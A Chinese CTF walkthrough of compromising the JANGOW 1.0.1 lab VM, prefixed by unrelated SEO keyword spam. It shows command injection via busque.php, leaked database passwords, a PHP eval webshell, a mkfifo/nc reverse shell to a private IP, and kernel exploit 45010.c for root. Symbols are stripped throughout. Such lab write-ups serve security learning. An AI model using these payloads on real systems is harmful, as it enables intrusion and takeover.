如何打开国外网站,免费收录网提交,电脑怎么做网站服务器,深圳网站设计报价文章目录 网卡配置信息收集主机发现端口扫描 漏洞利用反弹Shell提权 靶机文档#xff1a;JANGOW 1.0.1 下载地址#xff1a;Download (Mirror) 难易程度#xff1a;. 网卡配置
水果味儿
信息收集
主机发现 端口扫描 访问80端口 点击site目录 点击页面上方的一个选项… 文章目录 网卡配置信息收集主机发现端口扫描 漏洞利用反弹Shell提权 靶机文档JANGOW 1.0.1 下载地址Download (Mirror) 难易程度. 网卡配置
水果味儿
信息收集
主机发现 端口扫描 访问80端口 点击site目录 点击页面上方的一个选项发现Buscar的页面空白而且地址栏的url看着可以输入一些东西
http://192.168.8.16/site/busque.php?buscar在?buscar后面加上pwd显示了当前路径
/site/busque.php?buscarpwd /site/busque.php?buscarcat%20/etc/passwd /site/busque.php?buscarls%20-a 发现了wordpress 查看wordpress里都有什么文件 ls wordpress
查看cat%20wordpress/config.php页面空白需要查看页面源代码 发现了数据库配置
$database desafio02;
$username desafio02;
$password abygurl69;漏洞利用
使用命令执行写入一句话木马
echo ?php eval($_POST[6868]); 6868.php使用蚁剑连接一句话拿到webshell 跟site目录同级下有一个隐藏的.backup文件 $database jangow01;
$username jangow01;
$password abygurl69;拿到webshell权限极低啥也干不了
反弹Shell
查看攻略该网站限制了一些端口只能通过443端口进行访问
/etc/ufw/applications.d/查看apache2-utils.ufw.profile文件 上传木马
?php system(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 21|nc 192.168.8.8 443 /tmp/f);?kali监听443端口
访问该木马文件 成功反弹到 提权
交换shell
python3 -c import pty;pty.spawn(/bin/bash)查看内核版本 搜索相关漏洞
searchsploit ubuntu 4.4.0-31searchsploit -p linux/local/45010.c将45010.c上传的靶机
我先发送到我本机然后本机上传到蚁剑上 赋予可执行权限然后进行编译 上传一个a.out文件执行它 切到/root目录下